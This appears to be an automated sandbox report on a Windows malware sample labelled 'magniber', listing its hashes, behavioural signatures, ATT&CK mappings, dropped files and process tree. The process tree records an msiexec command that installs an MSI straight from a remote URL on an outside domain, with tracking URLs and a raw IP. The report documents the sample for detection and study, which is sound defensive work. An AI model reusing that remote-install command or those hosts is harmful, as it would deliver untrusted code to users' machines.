db34188d0c8c7a368adb4ce88d98ac2211713578cbab8d7af4d53e40923f8bbc

Analysis

max time kernel
133s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22-08-2024 07:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe
Size

1.4MB
MD5

744bd9b8ce6f387b87a889b6192f2a97
SHA1

eaf53c141cf1c49381cfc00ceb2a979235bbb973
SHA256

db34188d0c8c7a368adb4ce88d98ac2211713578cbab8d7af4d53e40923f8bbc
SHA512

b324ca5e34556f5d4d10dbec40a8e2f671b2cfb12558c2991bc2e0801afb95b8faabeec9c748ab4b6e6b4d11808a8af20631a1db5d2fbcfaff9a685743b6da18
SSDEEP

24576:oaQCUxTCzitB88sh2figvPk8z1RA1BDw7K6OrPQ9rklwjhDgai3fA5QVfMc:oalUA+glh2fTvM61m1BmKFQCwFDRofAw

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1588	~5902l3v0bk.tmp

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2292	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~5902l3v0bk.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2292	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2292	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2292	MSIEXEC.EXE
2292	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 1588	2148	2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe	84
PID 2148 wrote to memory of 1588	2148	2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe	84
PID 2148 wrote to memory of 1588	2148	2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe	84
PID 1588 wrote to memory of 2292	1588	~5902l3v0bk.tmp	92
PID 1588 wrote to memory of 2292	1588	~5902l3v0bk.tmp	92
PID 1588 wrote to memory of 2292	1588	~5902l3v0bk.tmp	92

C:\Users\Admin\AppData\Local\Temp\2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-22_744bd9b8ce6f387b87a889b6192f2a97_magniber.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Users\Admin\AppData\Local\Temp\~5902l3v0bk.tmp
  "C:\Users\Admin\AppData\Local\Temp\~5902l3v0bk.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://clatz.fileslldl.eu/client/pkgs/winpalace/WinPalace20141208022929.msi" DDC_DID=6828375 DDC_RTGURL=http://www.fileinst.eu/dl/TrackSetup/TrackSetup.aspx?DID=6828375 DDC_UPDATESTATUSURL=http://190.4.91.3:8080/winpalace/Lobby.WebServices/Installer.asmx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=107. SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~5902l3v0bk.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is60F1.tmp

Filesize
1KB

MD5
809c1911f8046876578dfb310ab8b59c

SHA1
ac2e096d3fbfc421a044e1afb62d9a609ac53bea

SHA256
98ed7cbe94777a6b504535c8b58d30a74c484d60988adf29a5b0e1fcce0e8ed3

SHA512
aea461891f885848eff435b604bc5f49db698c088daebbe505d029d4bfd93985369d8a7e408d7233f80ccc2212032384e9dbf94ac10716f0a34670cd2eea70f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A7AC0563-7586-40A3-B89D-5B5BDFDF9D0E}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A7AC0563-7586-40A3-B89D-5B5BDFDF9D0E}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~5902l3v0bk.tmp

Filesize
1.2MB

MD5
4585c89073d719951f34892e9fd71029

SHA1
3390a52a80ff6f6c9009050b2fde5e97a94ea564

SHA256
174e96231e56bfb6aa2b8d19061c0a301532afb3354be558e4e34bd1e4ad82e7

SHA512
1df932467404b051a63208df57a39219dbd116956c8a0cd9737bec2c4cdbd12daf83bcaa3a3069cbe0dd71ff574323ede9dd1b520f1c79d876c7f4012b8c5792

Download Submit
C:\Users\Admin\AppData\Local\Temp\~60DF.tmp

Filesize
5KB

MD5
3cb260c03995fe5f1687d8afa4ef0dd3

SHA1
454e1f8429121409ec78e564ade5c9575c2c242f

SHA256
e2b7cad20c97a7c33eecdb4621e09fb32d23b62023028389b390e358433a2061

SHA512
a49d61f0766b1cfd1c4d9594f7527293831289d50eb33b993c9a4918011db0bc255cafcba9b1d42307775ce15b5c82101aff6205bfe1184f3e682148bc94c5e0

Download Submit